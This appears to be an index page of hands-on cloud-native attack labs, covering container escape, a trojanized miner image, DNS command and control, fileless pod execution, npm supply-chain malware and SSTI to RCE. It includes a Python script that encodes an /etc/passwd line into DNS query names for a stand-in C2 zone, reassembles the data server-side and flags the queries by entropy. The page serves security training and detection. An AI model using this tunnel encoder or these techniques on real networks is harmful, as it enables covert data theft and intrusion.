Attack Scenarios

Offensive security techniques for testing cloud-native defenses

Container Escape via Privileged Pod

Deploy a privileged pod, chroot into the host filesystem to escape the container, detect the full attack chain with eBPF, and block it with Gatekeeper admission policies


Cryptominer Injection via Supply Chain

Build a trojanized container image with a hidden cryptominer, detect it with Falco and eBPF, and defend with image scanning and admission control


DNS Command & Control: TXT Record Tunneling Lab

Build a DNS-based C2 channel using TXT records and subdomain encoding. Hands-on lab with custom DNS server, data exfiltration scripts, server-side reassembly, and entropy-based detection.

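The three pieces that teaser names (subdomain encoding on the client, reassembly on the server, entropy-based detection) fit in one short script. The following is an added example written for this index, not code from the tutorial itself: the zone `c2.example.test`, the `<seq>.<base32 chunk>.<session>` label layout, and the sample data are all assumptions chosen for illustration.

```python
"""DNS TXT/subdomain tunnel: encode, reassemble, detect.

Added example, not the tutorial's own code. The C2 zone and the label
layout are hypothetical; the exfiltrated bytes and the benign query
names are constructed sample input so the script runs offline.
"""
import base64
import math
from collections import Counter, defaultdict

C2_DOMAIN = "c2.example.test"   # hypothetical attacker-controlled zone
CHUNK_BYTES = 30                 # 30 raw bytes -> 48 base32 chars, fits one 63-char label


def encode_exfil(session_id: str, data: bytes, chunk: int = CHUNK_BYTES) -> list[str]:
    """Client side: split data into chunks and emit one query name per chunk.

    Layout: <seq>.<base32 chunk without padding>.<session>.<C2_DOMAIN>
    Base32 is used because DNS labels are case-insensitive and limited to
    letters, digits and hyphens; padding is stripped and re-added on decode.
    """
    names = []
    for seq, offset in enumerate(range(0, len(data), chunk)):
        piece = base64.b32encode(data[offset:offset + chunk]).decode().rstrip("=").lower()
        names.append(f"{seq}.{piece}.{session_id}.{C2_DOMAIN}")
    return names


def reassemble(query_names: list[str]) -> dict[str, bytes]:
    """Server side: group queries by session, order by sequence, decode."""
    sessions: dict[str, dict[int, bytes]] = defaultdict(dict)
    suffix = "." + C2_DOMAIN
    for q in query_names:
        if not q.lower().endswith(suffix):
            continue                       # not for our zone (e.g. normal recursion noise)
        labels = q[: -len(suffix)].split(".")
        if len(labels) != 3:
            continue                       # malformed; ignore rather than crash the resolver
        seq, piece, sid = labels
        padded = piece.upper() + "=" * (-len(piece) % 8)   # restore base32 padding
        sessions[sid][int(seq)] = base64.b32decode(padded)
    return {sid: b"".join(parts[i] for i in sorted(parts)) for sid, parts in sessions.items()}


def shannon_entropy(s: str) -> float:
    """Bits per symbol of the string's character distribution."""
    n = len(s)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def flag_tunnel_queries(query_names: list[str], min_label: int = 20,
                        min_entropy: float = 3.5) -> list[str]:
    """Detection side: flag names whose longest label is both long and high-entropy.

    Either signal alone is noisy (short random labels have low entropy; long
    CDN hostnames have low entropy), so both must hold. Thresholds are
    starting points to tune against the resolver's own baseline.
    """
    flagged = []
    for q in query_names:
        longest = max(q.lower().rstrip(".").split("."), key=len)
        if len(longest) >= min_label and shannon_entropy(longest) >= min_entropy:
            flagged.append(q)
    return flagged


# Constructed sample input: one /etc/passwd line as the "secret", plus benign lookups.
SECRET = b"root:x:0:0:root:/root:/bin/bash\n"
BENIGN = ["www.example.com", "mail.google.com", "api.github.com",
          "cdn.jsdelivr.net", "login.microsoftonline.com"]

if __name__ == "__main__":
    exfil = encode_exfil("s1", SECRET)
    recovered = reassemble(exfil)
    print("recovered:", recovered["s1"])
    for q in flag_tunnel_queries(BENIGN + exfil):
        print("FLAGGED:", q)
```

Only the first query carries a full 30-byte chunk (a 48-character label); the 2-byte tail encodes to a 4-character label and slips under the length gate, which is exactly why production detectors also count distinct subdomains per registered domain and queries per client rather than scoring names one at a time.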

In-Memory Attacks on Kubernetes: Fileless Execution in Read-Only Pods

Transform ELF binaries into fileless payloads, execute them in read-only Kubernetes pods via memfd_create, and observe the full attack chain with eBPF


Shai-Hulud: Anatomy of a Production Supply Chain Exploit

Deep analysis of a real-world supply chain malware framework targeting npm packages, GitHub Actions, and CI/CD pipelines. Includes full source code, MITRE ATT&CK mapping, IOCs, and detection rules.


SSTI to RCE in Kubernetes

Exploit a Flask/Jinja2 Server-Side Template Injection to gain remote code execution inside a Kubernetes pod, then observe the attack with eBPF
